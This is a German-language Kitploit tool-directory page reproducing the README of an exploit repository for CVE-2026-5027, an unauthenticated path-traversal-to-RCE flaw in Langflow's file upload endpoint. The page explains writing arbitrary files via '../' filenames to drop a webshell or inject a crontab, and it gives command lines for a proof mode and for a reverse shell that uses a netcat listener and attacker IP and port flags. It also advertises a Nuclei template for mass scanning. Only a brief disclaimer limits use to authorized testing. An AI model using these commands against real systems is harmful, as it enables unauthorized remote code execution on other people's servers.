Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-5027
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔥 CVE-2026-5027 - Langflow Path Traversal

Cybersicherheits-Schwachstelle_ Path-Traversal-Exploit

Beliebiger Datei-Schreibzugriff bis zur RCE
Nicht authentifizierte Remote-Codeausführung über Datei-Upload

CVE CVSS Exploit

📌 Überblick

Langflow ist anfällig für eine kritische Path-Traversal-Schwachstelle im Datei-Upload-Endpunkt (POST /api/v2/files).

Ein Angreifer kann einen manipulierten Dateinamen mit ../-Sequenzen senden, um beliebige Dateien an beliebiger Stelle im Dateisystem des Servers zu schreiben.

Dies führt leicht zu vollständiger Remote-Codeausführung (RCE) – beispielsweise durch Ablegen einer Webshell oder Einschleusen in die Crontab.


🛠️ Funktionen

  • ✅ Ausnutzung ohne Authentifizierung (Standard-Auto-Login-Setups)
  • ✅ Einfacher Proof-of-Concept (schreibt Testdatei nach /tmp)
  • ✅ Vollständige Reverse-Shell über Cron (Linux)
  • ✅ Nuclei-Template für Massen-Scans enthalten
  • ✅ Einfach anpassbare Traversal-Tiefe

🚀 Schnellstart

1. Proof of Concept (Sicherer Test)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

Erwartete Ausgabe, falls verwundbar:

root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. Vollständige Reverse-Shell

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 Repository-Inhalte

DateiBeschreibung
CVE-2026-5027.pyHaupt-Python-Exploit (PoC + RCE)
CVE-2026-5027.yamlNuclei-Template zum Scannen
README.mdDiese Datei

🎯 Anwendungsbeispiele

cve-2026-5027

Proof-Modus

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

Reverse-Shell-Modus

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ Haftungsausschluss

Dieses Repository dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken.

Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine ausdrückliche Erlaubnis zum Testen haben.


Mit ❤️ gemacht für die Red-Team-Community

Tool herunterladen